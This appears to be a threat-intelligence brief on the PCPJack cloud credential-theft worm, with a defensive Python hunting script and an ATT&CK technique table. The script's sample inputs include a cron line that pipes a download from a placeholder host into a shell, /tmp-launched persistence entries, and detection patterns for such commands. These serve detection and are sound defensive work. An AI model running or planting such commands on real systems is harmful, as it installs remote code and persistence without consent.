EXECUTIVE SUMMARY
A notorious threat actor persona, TeamPCP, has been linked to a credential theft framework known as PCPJack, which is designed to worm across exposed cloud infrastructure and remove artifacts associated with TeamPCP. The framework, attributed to a single actor or group familiar with TeamPCP's tooling, targets a broad range of services, including Docker, Kubernetes, Redis, MongoDB, and vulnerable web applications. The attacker's primary goal appears to be monetization through credential theft, fraud, spam, extortion, or resale of stolen access.
PCPJack's infection process begins with a shell script called bootstrap.sh, which sets up the environment, downloads additional payloads, and removes processes or artifacts associated with TeamPCP. The framework uses a Python virtual environment to install required modules, including a worm that spreads to additional hosts through lateral movement and exploitation of vulnerabilities in web technologies. The attacker maintains control through a Telegram bot, which receives commands and posts data to a channel. The framework's design is modular, making it harder to analyze in isolation, and it uses encryption to protect sensitive data.
The PCPJack framework poses a significant threat to organizations, particularly those with cloud-based infrastructure, as it can spread undetected and steal sensitive information, including environment variables, SSH private keys, and cryptocurrency wallets. The attacker's use of a credential theft framework, combined with their focus on removing TeamPCP's services, suggests a high level of sophistication and a willingness to adapt and evolve their tactics. To defend against these threats, organizations should adhere to cloud and web application security best practices, including credential management, authentication mechanisms, and secure configuration of services like Docker and Kubernetes.
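The two paragraphs above describe where this framework leaves traces (a bootstrap script, a Python virtual environment, cron and systemd persistence) and where it gets in (exposed Docker and Kubernetes APIs). The following added example, which is not PCPJack's code nor from the report's authors, shows defender-side hunting heuristics over those artifacts: it scans crontab text and a systemd unit for commands launched from temporary directories, venv interpreters or download-and-pipe-to-shell one-liners, and checks a Docker daemon.json for a TCP listener without TLS verification. All sample inputs (the cron lines, the unit file, the two daemon.json variants) are constructed for the example; the `hosts`/`tlsverify` keys are real Docker daemon settings, while the path patterns are assumptions about what a careful reviewer would flag, not indicators taken from the report.

```python
"""Hunting heuristics for the persistence and exposure patterns described in the report.
Added example: not PCPJack code, and every sample artifact below is constructed."""
import json
import re
from dataclasses import dataclass

# Commands launched from world-writable or temporary directories (assumed heuristic).
SUSPICIOUS_PATH = re.compile(r"""(^|[\s="'])(/tmp|/dev/shm|/var/tmp)/""")
# A venv interpreter, the report's bootstrap.sh name, or "fetch | sh" style execution.
VENV_OR_SHELL = re.compile(
    r"(/venv/bin/python|/\.venv/|bootstrap\.sh|\bcurl\b.*\|\s*(ba)?sh\b|\bwget\b.*\|\s*(ba)?sh\b)"
)


@dataclass
class Finding:
    source: str   # which artifact the line came from
    reason: str   # why it was flagged
    line: str     # the offending line, verbatim


def scan_cron(text: str, source: str = "crontab") -> list[Finding]:
    """Flag cron entries that run from temp paths, a venv python, or a piped download."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if SUSPICIOUS_PATH.search(line):
            findings.append(Finding(source, "runs from a temporary/world-writable directory", line))
        elif VENV_OR_SHELL.search(line):
            findings.append(Finding(source, "invokes a venv interpreter or pipes a download to a shell", line))
    return findings


def scan_systemd_unit(text: str, source: str) -> list[Finding]:
    """Flag ExecStart/ExecStartPre lines with the same patterns (T1543.002 hunting)."""
    findings = []
    for line in text.splitlines():
        if line.startswith(("ExecStart=", "ExecStartPre=")):
            if SUSPICIOUS_PATH.search(line) or VENV_OR_SHELL.search(line):
                findings.append(Finding(source, "ExecStart uses a temporary path or venv interpreter", line))
    return findings


def check_docker_daemon(config_json: str) -> list[str]:
    """Report a Docker API TCP listener exposed without TLS or bound to all interfaces."""
    cfg = json.loads(config_json)
    issues = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if tcp_hosts and not cfg.get("tlsverify"):
        issues.append("Docker API listens on TCP without tlsverify: " + ", ".join(tcp_hosts))
    for host in tcp_hosts:
        if "0.0.0.0" in host or host.startswith("tcp://:"):
            issues.append("Docker API bound to all interfaces: " + host)
    return issues


# --- constructed sample artifacts (not real indicators) ---
CRON_SAMPLE = """# m h dom mon dow command
0 3 * * * /usr/bin/apt-get update
*/5 * * * * /tmp/.cache/venv/bin/python /tmp/.cache/worm.py
@reboot curl -s http://example.invalid/b.sh | sh
"""

UNIT_SAMPLE = """[Unit]
Description=System cache helper
After=network.target

[Service]
ExecStart=/tmp/.cache/venv/bin/python /tmp/.cache/worm.py
Restart=always

[Install]
WantedBy=multi-user.target
"""

DOCKER_WEAK = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
DOCKER_HARDENED = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

if __name__ == "__main__":
    for f in scan_cron(CRON_SAMPLE) + scan_systemd_unit(UNIT_SAMPLE, "cache-helper.service"):
        print(f"[{f.source}] {f.reason}: {f.line}")
    print("weak daemon.json:", check_docker_daemon(DOCKER_WEAK))
    print("hardened daemon.json:", check_docker_daemon(DOCKER_HARDENED))
```

On a real host the inputs would come from `crontab -l`, `/etc/cron.d/*`, unit files under `/etc/systemd/system` and `/etc/docker/daemon.json`; the heuristics are deliberately coarse and will need tuning against legitimate deployments that run from a venv.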
THREAT PROFILE:
| Tactic | Technique ID | Technique | Sub-technique |
|---|---|---|---|
| Initial Access | T1190 | Exploit Public-Facing Application | — |
| Execution | T1059.004 | Command and Scripting Interpreter | Unix Shell |
| Persistence | T1543.002 | Create or Modify System Process | Systemd Service |
| Persistence | T1053.003 | Scheduled Task/Job | Cron |
| Defense Evasion | T1027 | Obfuscated Files or Information | — |
| Credential Access | T1552.001 | Unsecured Credentials | Credentials In Files |
| Credential Access | T1212 | Exploitation for Credential Access | — |
| Discovery | T1613 | Container and Resource Discovery | — |
| Lateral Movement | T1210 | Exploitation of Remote Services | — |
| Initial Access | T1078 | Valid Accounts | — |
MBC MAPPING:
REFERENCES:
reports contain further technical details: